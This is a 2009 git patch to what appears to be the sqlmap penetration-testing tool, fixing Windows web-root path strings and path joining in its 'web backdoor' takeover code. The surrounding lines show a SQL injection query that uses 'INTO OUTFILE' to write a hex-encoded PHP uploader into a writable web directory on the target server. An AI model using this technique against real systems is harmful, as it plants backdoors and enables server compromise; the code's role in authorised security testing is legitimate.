From 57b8bb4c8e616838479670eebdfd0886909aa86a Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Tue, 28 Apr 2009 21:51:22 +0000 Subject: [PATCH] Minor syntax adjustment for web backdoor functionality --- lib/core/common.py | 6 +++--- plugins/generic/takeover.py | 7 +------ 2 files changed, 4 insertions(+), 9 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 2863c2759..16b1c8b04 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -228,7 +228,7 @@ def getDocRoot(): pagePath = os.path.dirname(conf.path) if kb.os == "Windows": - defaultDocRoot = "C:\\Inetput\\wwwroot\\" + defaultDocRoot = "C:/Inetpub/wwwroot/" else: defaultDocRoot = "/var/www/" @@ -247,7 +247,7 @@ def getDocRoot(): docRoot = absFilePath[:index] if absFilePathWin: - docRoot = "C:\\%s" % docRoot.replace("/", "\\") + docRoot = "C:/%s" % docRoot.replace("\\", "/") break @@ -274,7 +274,7 @@ def getDirs(): directories = set() if kb.os == "Windows": - defaultDir = "C:\\Inetput\\wwwroot\\test\\" + defaultDir = "C:/Inetpub/wwwroot/test/" else: defaultDir = "/var/www/test/" diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index 6bfbb7998..1f481c185 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -137,14 +137,9 @@ class Takeover(Abstraction, DEP, Metasploit, Registry): uploaderName = "uploader.php" uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName)) - if kb.os == "Windows": - sep = "\\\\" - else: - sep = "/" - for directory in directories: # Upload the uploader agent - outFile = os.path.normpath("%s%s%s" % (directory, sep, uploaderName)) + outFile = os.path.normpath("%s/%s" % (directory, uploaderName)) uplQuery = uploaderStr.replace("WRITABLE_DIR", directory) query = " LIMIT 1 INTO OUTFILE '%s' " % outFile query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)